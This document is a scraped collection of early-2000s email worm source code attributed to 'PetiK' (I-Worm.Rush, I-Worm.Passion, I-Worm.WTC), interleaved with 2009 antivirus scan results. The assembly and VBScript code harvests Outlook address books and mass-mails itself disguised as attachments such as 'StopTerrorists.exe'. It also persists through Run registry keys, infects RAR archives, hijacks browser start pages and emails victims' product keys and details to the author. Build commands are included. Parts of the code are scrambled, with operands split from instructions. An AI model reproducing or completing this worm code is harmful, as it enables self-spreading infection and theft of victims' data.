db "New Scan Virus...",0 "Hi man,",0dh,0ah "I send you the last update of ScanVir (v 2.5).",0dh,0ah "Look at the file attached.",0dh,0ah,0dh,0ah 09h,09h,09h,09h,"Bye and have a nice day.",0 "Your Best Friend",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ? namefrom ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset orig_worm offset name_mail ?

MsgFrom dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd

Attach

txtd: db "Hi man,",0dh,0ah,0dh,0ah db "I don't want to destroy your computer.",0dh,0ah

db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah db 09h,09h,09h,"PetiK",00h TXTSIZE equ $-txtd vbsd: db 'On Error Resume Next',0dh,0ah db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah db 'txt.Close',0dh,0ah db 'For Each M In chan.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O=1 To M.AddressEntries.Count',0dh,0ah db 'Set P=M.AddressEntries(O)',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah db 'txt.WriteLine P.Address',0dh,0ah db 'txt.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah db 'txt.WriteLine "#"',0dh,0ah db 'txt.Close',0dh,0ah VBSSIZE equ $-vbsd signature origine author end start end db "I-Worm.Rush",00h db "A worm made in France",00h db "Written by PetiK - 2001",00h

File Rush.exe received on 05.16.2009 19:29:11 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm Worm/Petik.H1 Worm/Win32.Win32 W32/Malware!92e7 Win32:Petik-Rush I-Worm/Petik.L Generic.Malware.SMsp!g.42345E6D I-Worm.Petik Worm.Petik Worm.Win32.Petik.Q Win32.Petik.8192 Suspicious File Win32/Himan W32/Malware!92e7 Email-Worm.Win32.Petik W32/PetTick@mm Generic.Malware.SMsp!g.42345E6D Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!7B523F10E098 Worm.Petik.H1 Worm:Win32/Petick.H@mm Win32/Petik.Q W32/Pet_Tick.5632.B Worm/W32.Petik.5632.B W32/Petik I-Worm.Rush.A High Risk Cloaked Malware Worm.Mail.Petik.m W32/Petik-H Worm.Petik W95.Pet_Tick.gen WORM_PET.TICK.Q Win32.Worm.Petik.8192 I-Worm.Win32.Petik I-Worm.Rush.A

Additional information File size: 5632 bytes MD5...: 7b523f10e09815dd401a4db17a9813c5 SHA1..: b7f647c90aeb06ee2ce145c152d09bf67966559f PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Passion Author : PetiK Date : September 3rd - September 8th Size : 5120 byte (compiled with UPX tool) Action : Copy * Add in * itself to WINDOWS\SYSTEM\MsVbdll32.exe the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value MsVbdll = WINDOWS\SYSTEM\MsVbdll32.exe

In dependency on system counter it redirect URL to : http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm If the key HKCU\Software\[Check Passion] doesn't exist it send a mail to passion@multimania.com some information about victim. It creates %windir%\AllMail.txt with all mails that it founds in the Outlook Address Book and send a new mail : Subject : Take a look at this... Body : It's very important. Mail me if you have some problems. Attachment : Important.exe It sends a mail to passionworm@multimania.com (passionpetik) too with some informations. To build the worm: @echo off tasm32 /ml /m9 Passion tlink32 -Tpe -c -x -aa Passion,,,import32,dllz upx -9 Passion.exe if exist *.obj del *.obj if exist *.map del *.map To delete the worm: del %windir%\system\MsVbdll32.exe del %windir%\AllMail.txt # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: twin_worm: push mov push push callx mov push push push callx add mov stosd mov stosd mov stosd mov stosd pop call hide_worm 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"VsM\" eax,"lldb" eax,"e.23" eax,"ex" edi <= copy of the worm <= mails are saved here

push push push callx

0 edi esi CopyFileA

reg_save: push 8 push edi push 1 @pushsz "MsVbdll" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA check_connect: push 0 push offset connected callx InternetGetConnectedState dec eax jnz exec_other system_counter: callx GetTickCount xor edx,edx mov ecx,10 div ecx cmp edx,2 jne check_connect call change_page chec_reg: push offset regDisp push offset regResu push 0 push 0F003Fh push 0 push 0 push 0 @pushsz "Software\[Check Passion]" push 80000001h callx RegCreateKeyExA push [regResu] callx RegCloseKey cmp [regDisp],1 jne vbs_file search_info: push 50 push offset passion_txt callx GetWindowsDirectoryA @pushsz "\Passion.txt" push offset passion_txt callx lstrcat call CreateDate call CreateTime push offset passion_txt push offset date @pushsz "Date" @pushsz "Date et Heure" callx WritePrivateProfileStringA push offset passion_txt push offset time @pushsz "Heure" @pushsz "Date et Heure" callx WritePrivateProfileStringA mov esi,offset name_user call name_size dd 30 name_size: push esi call reg dd 1 reg: @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion"

push 80000002h callx SHGetValueA push offset passion_txt push offset name_user @pushsz "Nom d'enregistrement" @pushsz "Information systême" callx WritePrivateProfileStringA mov esi,offset name_company call company_size dd 30 company_size: push esi call reg2 dd 1 reg2: @pushsz "RegisteredOrganization" @pushsz "Software\Microsoft\Windows\CurrentVersion" push 80000002h callx SHGetValueA push offset passion_txt push offset name_company @pushsz "Nom de l'entreprise" @pushsz "Information systême" callx WritePrivateProfileStringA mov esi,offset number_key call key_size dd 30 key_size: push esi call reg3 dd 1 reg3: @pushsz "ProductKey" @pushsz "Software\Microsoft\Windows\CurrentVersion" push 80000002h callx SHGetValueA push offset passion_txt push offset number_key @pushsz "Numéro de la clé Windows" @pushsz "Information systême" callx WritePrivateProfileStringA push 50 push offset Systemini callx GetWindowsDirectoryA @pushsz "\Win.ini" push offset Systemini callx lstrcat push offset Systemini push 20 push offset org_pays push offset default @pushsz "sCountry" @pushsz "intl" callx GetPrivateProfileStringA push offset passion_txt push offset org_pays @pushsz "Pays" @pushsz "Information systême" callx WritePrivateProfileStringA xor push push push push push callx eax,eax eax eax offset Message2 eax [hMapi] MAPISendMail

vbs_file: pushad push 00h push 80h push 02h push 00h push 01h

push 40000000h @pushsz "C:\passion.vbs" callx CreateFileA xchg edi,eax push 0 push offset octets push vbssize push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\passion.vbs" callx WinExec push 1000 callx Sleep @pushsz "C:\passion.vbs" callx DeleteFileA start_scan: mov push push push callx add mov stosd mov stosd mov stosd xor stosd edi,offset allmail edi 50 edi GetWindowsDirectoryA edi,eax eax,"llA\" eax,"liaM" eax,"txt." eax,eax

open_scan_mail: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset allmail callx CreateFileA inc eax je end_spread dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_s2 eax,esi 0 ebx

callx GetFileSize cmp eax,3 jbe end_s3 scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail entr2: xor al,al stosb pop edi jmp scan_mail f_mail: end_s3: callx end_s2: callx end_s1: callx end_spread: popad jmp exec_other: push callx push push callx end_w: callx push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle end_w 10000 Sleep 0 offset copy_worm WinExec push 00h ExitProcess

hide_worm: pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret change_page: pushad call @value

db "Default_Page_URL",0 db "Search Page",0 db "Start Page",0 db "Local Page",0 @value: pop esi push 4 pop ecx p_loop: push ecx push 32 @pushsz "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm" push 1 push esi @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h callx SHSetValueA @endsz pop ecx loop p_loop popad ret CreateDate Proc pushad mov edi,offset date push 32 push edi @pushsz "ddd, dd MMM yyyy" push 0 push 0 push 9 callx GetDateFormatA popad ret CreateDate EndP CreateTime Proc pushad mov edi,offset time push 32 push edi @pushsz "HH:mm:ss" push 0 push 0 push 9 callx GetTimeFormatA popad ret CreateTime EndP send_mail: xor push push push push push callx ret eax,eax eax eax offset Message eax [hMapi] MAPISendMail

.data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) date time db 17 dup (?) db 9 dup (?) === dd 0 dd 0 dd 0 db 0 db 50 dup (0) db 20 dup(0) db 50 dup (0) dd 0 dd 0

; === search_info name_user name_company number_key default Systemini org_pays passion_txt regDisp regResu

; === spread === connected dd 0 octets dd ? allmail db 50 dup (0) mail_addr db 128 dup (?) hMapi dd 0 subject body name_mail subject2 body2 mail_me Message dd dd dd dd dd dd dd dd dd dd dd Message2 dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd MsgTo dd dd dd dd dd dd db db db db db "Take a look at this...",0 "It's very important. Mail me if you have some problems.",0 "Important.exe",0 "Worm.Passion",0 "Another person",0 db "passionworm@multimania.com",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach ? offset offset ? ? ? 2 offset 1 offset 1 offset dd ? ? ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ? 1 ? offset mail_me ? ? dd ? ? ? offset orig_worm offset name_mail ? dd ? ? ? offset passion_txt ? ? subject2 body2

MsgFrom MsgTo2 Attach2

MsgFrom

MsgTo2 dd dd dd dd dd Attach dd dd dd dd dd Attach2 dd dd dd dd dd

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt")',0dh,0ah db 'txt.Close',0dh,0ah db 'For Each M In chan.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O=1 To M.AddressEntries.Count',0dh,0ah db 'Set P=M.AddressEntries(O)',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah db 'txt.WriteLine P.Address',0dh,0ah db 'txt.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah db 'txt.WriteLine "#"',0dh,0ah db 'txt.Close',0dh,0ah vbssize equ $-vbsd signature author end start end db "I-Worm.Passion",00h db "Coded by PetiK - 2001",00h

File Passion.exe received on 05.16.2009 19:28:44 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm.5120 Worm/Petik.AV.07 Worm/Win32.Win32 W32/Malware!cacd Win95:Passion I-Worm/Petik Generic.Malware.SMksp!g.37F2CD76 I-Worm.Petik Worm.Win32.Petik.V Win32.Petik.8192 Suspicious File W32/Malware!cacd Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.SMksp!g.37F2CD76 Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!0A4E37025FEC Worm.Petik.AV.07 Worm:Win32/Petick.O@mm Win32/Petik.V W32/Petik.R W32/Petik.C I-Worm.Passion.A High Risk Cloaked Malware Worm.Mail.Win32.Petik W32/Petik-M Email-Worm.Win32.Petik W95.Pet_Tick.gen WORM_PET.TICK.O Win32.Worm.Petik.8192 I-Worm.Passion.A

Additional information File size: 5120 bytes MD5...: 0a4e37025fec58713036fa88a28a070e SHA1..: d85aa3be13c031e015b7378c7cb1951fb7ba2efa PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.WTC (aka:I-Worm.Super -> It was the first worm's name.) Author : PetiK Date : September 11th (A great day that we don't forget all around the world) - October 11th Size : 8704 byte (compiled with upx tool) Action: Copy itself to * WINDOWS\SYSTEM\Visual8.exe Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value * Visual Debugger = WINDOWS\SYSTEM\Visual8.exe It infects all RAR files in the Personal directory. It creates C:\wrm.vbs. This file search and stocks all email in the WAB to the file C:\email.mel. Wait 2 sec. and deletes the vbs file. When the current day is the 11th it displays a messagebox. Note of the author. ------------------After the terrible terrorist attacks, I wanted to do something. I can't destroy the computers to show my anger. It's a stupid reaction. I wanted to warn people to help to find the authors of this attacks. And I wanted to help myself. The target of this worm is not to spread to infect other computers but to help FBI, etc... in their investigation. To delete the worm : @echo off del %windir%\SYSTEM\Visual8.exe attrib -H C:\email.mel del C:\email.mel To built the worm : @echo off tasm32 /ml /m9 WTC tlink32 -Tpe -c -x -aa WTC,,,import32,dllz upx -9 WTC.exe if exist *.obj del *.obj if exist *.map del *.map # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: call twin_worm: push mov push push api mov push push push api add mov stosd mov call hide_worm mess_worm 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"siV\" eax,"8lau"

stosd mov eax,"exe." stosd pop edi push push push api 0 edi esi CopyFileA

push 15 push edi push 1 @pushsz "Visual Debugger" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA special_folder: pushad push 0 push 5 push offset personal push 0 api SHGetSpecialFolderPathA push offset personal api SetCurrentDirectoryA call get_worm_crc find_first_rar: push offset Search @pushsz "*.rar" api FindFirstFileA inc eax je find_close_rar dec eax mov [hSearch],eax i_r: call infect_rar push offset Search push [hSearch] api FindNextFileA test eax,eax jne i_r find_close_rar: push [hSearch] api FindClose end_virtual: push 8000h push 0 push [worm_main] api VirtualAlloc end_all_rar: popad call vbs_file push 2 or 20h @pushsz "C:\email.mel" api SetFileAttributesA 0 offset inet InternetGetConnectedState eax verif_inet

verif_inet: push push api dec jnz

open_scan_mail: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h @pushsz "C:\email.mel" api CreateFileA inc eax

je dec xchg xor push push push push push push api test je xchg xor push push push push push api test je xchg push push api cmp jbe

end_spread eax eax,ebx eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_s2 eax,esi 0 ebx GetFileSize eax,3 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"%" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail entr2: xor al,al stosb pop edi jmp scan_mail f_mail: end_s3: api end_s2: api end_s1: api end_spread: popad push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle

start_page: pushad mov edi,offset sinet

call sinet_size dd 160 sinet_size: push edi call reg dd 1 reg: @pushsz "Start Page" @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h api SHGetValueA call @web db "http://stcom.net/",0 db "http://stcom.net/default2.htm",0 db "http://stcom.net/qoqazfr",0 db "http://stcom.net/kavkoz",0 db "http://stcom.net/falestine",0 db "http://stcom.net/oulamah",0 db "http://stcom.net/Oulamah",0 db "http://stcom.net/An-Nissa",0 db "http://stcom.net/ahghanistan",0 db "http://www.alesteqlal.com/",0 @web: pop esi push 10 pop ecx w_loop: push ecx push esi push offset sinet api lstrcmp test eax,eax jnz continue call alert_fbi jmp end_web continue: @endsz pop ecx loop w_loop end_web: popad end_worm: push api 0 ExitProcess

hide_worm: pushad @pushsz "Kernel32.dll" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret mess_worm: pushad push offset SystemTime api GetSystemTime cmp [SystemTime.wDay],04h jne end_mess push 40h @pushsz "I-Worm.Super coded by PetiK" call @txt db "Because of the different terrorism acts in the USA",0dh,0ah db "I don't will destroy your computer.",0dh,0ah,0dh,0ah db "If you have some informations about the authors or Ben Laden,",0dh,0ah db 9,"PLEASE CONTACT THE FBI",0

@txt: push 0 api MessageBoxA end_mess: popad ret get_worm_crc Proc pushad push 0 push 80h push 3 push 0 push 0 push 80000000h push offset copy_worm api CreateFileA inc eax je end_all_rar dec eax mov [hFile],eax push push api mov mov mov push push push push push api test pop je xchg mov push push push push push push api pop mov call mov 0 eax GetFileSize [filesize],eax [RARCompressed],eax [RAROriginal],eax eax 4 1000h or 2000h eax 0 VirtualAlloc eax,eax edx end_file eax,ebx [worm_main],ebx edx 0 offset tmp edx ebx [hFile] ReadFile edi esi,ebx CRC32 [RARCRC32],eax

end_file: push [hFile] api CloseHandle popad ret get_worm_crc EndP CRC32 Proc push ecx push edx push ebx xor ecx,ecx dec ecx mov edx,ecx nxt_byte_crc: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 nxt_bit_crc:

shr rcr jnc xor xor no_crc: dec jnz xor xor dec jne not not pop mov rol mov pop pop ret CRC32 EndP

bx,1 ax,1 no_crc ax,08320h bx,0EDB8h dh nxt_bit_crc ecx,eax edx,ebx edi nxt_byte_crc edx ecx ebx eax,edx eax,16 ax,cx edx ecx

infect_rar Proc pushad push offset Search.cFileName api GetFileAttributesA cmp eax,1 je end_inf push 0 push 80h push 3 push 0 push 0 push 80000000h or 40000000h push offset Search.cFileName api CreateFileA inc eax je end_inf dec eax xchg eax,ebx push push push push api mov push pop call mov 2 0 0 ebx SetFilePointer esi,offset RARHeaderCRC+2 end_RAR-RARHeader-2 edi CRC32 [RARHeaderCRC],ax

;calculate CRC32 of rar header

push 0 push offset tmp push end_RAR-RARHeader call end_RAR RARHeader: RARHeaderCRC dw 0 RARType db 74h RARFlags dw 8000h RARHSize dw end_RAR-RARHeader RARCompressed dd 2000h RAROriginal dd 2000h RAROS db 0 RARCRC32 dd 0 RARFileDateTime dd 12345678h RARNeedVer db 14h RARMethod db 30h RARFNameSize dw end_RAR-RARName RARAttrib dd 0 RARName db 'SUPER.EXE' end_RAR:push ebx api WriteFile ;write the rar header push push push 0 offset tmp [filesize]

push push api push api

[worm_main] ebx WriteFile ebx CloseHandle

;write the worm ;close the file

push 1 push offset Search.cFileName api SetFileAttributesA end_inf:popad ret infect_rar EndP vbs_file Proc pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\wrm.vbs" api CreateFileA xchg eax,ebx

;set already-infected mark

push 0 call @tmp dd ? @tmp: push e_vbs - s_vbs call e_vbs s_vbs: db 'On Error Resume Next',CRLF db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF db 'Set O=CreateObject("Outlook.Application")',CRLF db 'Set M=O.GetNameSpace("MAPI")',CRLF db 'Set mel=f.CreateTextFile("C:\email.mel")',CRLF db 'mel.Close',CRLF db 'For Each N In M.AddressLists',CRLF db 'If N.AddressEntries.Count <> 0 Then',CRLF db 'For c=1 To N.AddressEntries.Count',CRLF db 'Set P=N.AddressEntries(c)',CRLF db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF db 'mel.WriteLine P.Address',CRLF db 'mel.Close',CRLF db 'Next',CRLF db 'End If',CRLF db 'Next',CRLF db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF db 'mel.WriteLine "%"',CRLF db 'mel.Close',CRLF e_vbs: push ebx api WriteFile push ebx api CloseHandle push 1 @pushsz "wscript C:\wrm.vbs" api WinExec push 5000 api Sleep @pushsz "C:\wrm.vbs" api DeleteFileA popad ret vbs_file EndP send_mail: xor push push push push push api ret alert_fbi: eax,eax eax eax offset MsgWrm eax [hMAPI] MAPISendMail

@pushsz "C:\information.txt" push offset sinet @pushsz "Start Page of MSIE" @pushsz "Information about the suspect written by the Worm" api WritePrivateProfileStringA mov edi,offset names call name_size dd 160 name_size: push edi call reg2 dd 1 reg2: @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion" push 80000002h api SHGetValueA @pushsz "C:\information.txt" push offset names @pushsz "Name of the suspect" @pushsz "Information about the suspect written by the Worm" api WritePrivateProfileStringA push 50 push offset Systemini api GetWindowsDirectoryA @pushsz "\Win.ini" push offset Systemini api lstrcat push offset Systemini push 20 push offset org_pays push offset default @pushsz "sCountry" @pushsz "intl" api GetPrivateProfileStringA @pushsz "C:\information.txt" push offset org_pays @pushsz "Country of the suspect" @pushsz "Information about the suspect written by the Worm" api WritePrivateProfileStringA xor eax,eax push eax push eax push offset MsgFbi push eax push [hMAPI] api MAPISendMail push 30000 api Sleep @pushsz "C:\information.txt" api DeleteFileA ret .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) rar_worm db 50 dup (0) ; === rar_files === personal db 50 dup (0) worm_main dd ? tmp dd ? filesize dd ? hFile dd ? hSearch dd ? ; === scan_mail === mail_addr db 128 dup (?) hMAPI dd 0 inet dd 0 ; === information ===

sinet names Systemini org_pays default

dd dd db db

0 0 50 dup (0) 20 dup(0) db 0 === db "C:\information.txt",0 db "newyork@fbi.gov",0 "WARNING ABOUT DJIHAD AND PERHAPS BENLADEN !",0 db "This is a mail written by a worm called " "I-Worm.WTC coded by PetiK.",CRLF "The reason to receive this sort of mail is that the " "worm has found in the somebody's computer the link " "to http://stcom.net or other site web dealing with the djihad.",CRLF,CRLF "You can see some informations about this person with Start Page " "of MSIE, registered owner and the country.",CRLF,CRLF "I hope that it help you in your investigations about the " "terrorist attacks in NYC and Washington DC.",CRLF,CRLF 9,9,"Worm.WTC - PetiK",0

; === gen_mail infofbi mailfbi subjectfbi db bodyfbi db db db db db db db db db subjectwrm bodywrm name_mail MsgFbi dd dd dd dd dd dd dd dd dd dd dd MsgFrom dd dd dd dd dd MsgToFbi dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd MsgToWrm

db "Everybody against the terrorists !",0 db "This freeware will help us to fight the terrorist " db "who kill innocent civilians.",CRLF,CRLF db 9,"Click at the attached file to see.",00h db "StopTerrorists.exe",00h dd ? offset subjectfbi offset bodyfbi ? ? ? 2 offset MsgFrom 1 offset MsgToFbi 1 offset AttachFbi dd ? ? ? ? ? ? ? 1 ? offset mailfbi ? ? ? ? ? offset infofbi ? ? dd ? offset subjectwrm offset bodywrm ? ? ? 2 offset MsgFrom 1 offset MsgToWrm 1 offset AttachWrm

AttachFbi

MsgWrm

dd ?

dd dd dd dd dd AttachWrm dd dd dd dd dd dd

1 ? offset mail_addr ? ? ? ? ? offset orig_worm offset name_mail ?

signature author end start end SUPER.VBS

db "I-Worm.WTC",00h db "Coded by PetiK - 2001",00h

On Error Resume Next Set ws=CreateObject("WScript.Shell") verif=ws.RegRead("HKLM\Software\Microsoft\SuperWorm\") If verif <> "send" Then ro1=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ro2=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") pk=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") pi=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") ver=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") vern=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") sp=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") ld=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage") Set OA=CreateObject("Outlook.Application") Set EM=OA.CreateItem(0) EM.To="petik@multimania.com" EM.BCC = "support@microsoft.com; support@avx.com; nimda-request@sophos.com" EM.Subject="I am infected by I-Worm.Super !!" body="My name is " & ro1 & "," body = body & VbCrLf & "I was infected by I-Worm.Super :-(" body = body & VbCrLf & "It was on "& date & " at " & time & "." body = body & VbCrLf & "" body = body & VbCrLf & "If you want some informations about me :" body = body & VbCrLf & "My registered owner : " & ro1 body = body & VbCrLf & "My registered organization : " & ro2 body = body & VbCrLf & "My Product Key : " & pk body = body & VbCrLf & "My Product Indentification : " & pi body = body & VbCrLf & "My version of Windows : " & ver & " " & vern body = body & VbCrLf & "My start page of MSIE : " & sp body = body & VbCrLf & "My country : " & ld body = body & VbCrLf & "" body = body & VbCrLf & "Please help me !" body = body & VbCrLf & "Thank you very much." EM.Body=body EM.DeleteAfterSubmit=True EM.Send ws.RegWrite "HKLM\Software\Microsoft\SuperWorm\","send" End If

